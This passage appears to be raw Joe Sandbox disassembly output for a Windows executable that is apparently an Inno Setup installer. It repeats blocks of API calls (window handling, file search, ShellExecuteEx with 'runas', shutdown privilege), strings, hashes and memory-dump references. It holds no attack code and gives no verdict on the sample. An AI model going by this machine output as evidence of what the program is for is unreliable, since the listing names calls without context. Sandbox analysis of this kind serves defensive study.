                                                              • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                              • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                              APIs
                                                                • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0), ref: 004783CC
                                                                • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021E2BD0,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                              • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                              • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                              • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                              • API String ID: 883996979-221126205
                                                              • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                              • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                              • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                              • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                              APIs
                                                              • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                              • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSendShowWindow
                                                              • String ID:
                                                              • API String ID: 1631623395-0
                                                              • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                              • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                              • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                              • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00418393
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                              • GetWindowRect.USER32(?), ref: 004183CC
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                              • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                              • ScreenToClient.USER32(00000000), ref: 004183F8
                                                              • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                              • String ID: ,
                                                              • API String ID: 2266315723-3772416878
                                                              • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                              • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                              • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                              • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 107509674-3733053543
                                                              • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                              • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                              • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                              • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                              APIs
                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CryptVersion
                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                              • API String ID: 1951258720-508647305
                                                              • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                              • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                              • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                              • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                              • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                              • String ID: isRS-$isRS-???.tmp
                                                              • API String ID: 134685335-3422211394
                                                              • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                              • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                              • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                              • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                              APIs
                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                              • SetForegroundWindow.USER32(?), ref: 00457649
                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                              Strings
                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                              • API String ID: 2236967946-3182603685
                                                              • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                              • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                              • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                              • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                              • API String ID: 1646373207-3712701948
                                                              • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                              • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                              • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                              • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Placement$Iconic
                                                              • String ID: ,
                                                              • API String ID: 568898626-3772416878
                                                              • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                              • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                              • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                              • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                              • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                              • String ID:
                                                              • API String ID: 4011626565-0
                                                              • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                              • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                              • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                              • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                              • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                              • String ID:
                                                              • API String ID: 4011626565-0
                                                              • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                              • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                              • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                              • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                              • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                              • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 1177325624-0
                                                              • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                              • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                              • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                              • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 0048397A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                              • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                              • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$IconicLong
                                                              • String ID:
                                                              • API String ID: 2754861897-0
                                                              • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                              • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                              • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                              • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                              • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                              • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                              • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                              • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 004241E4
                                                              • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021E25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                              • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveFocusIconicShow
                                                              • String ID:
                                                              • API String ID: 649377781-0
                                                              • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                              • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                              • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                              • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00417D0F
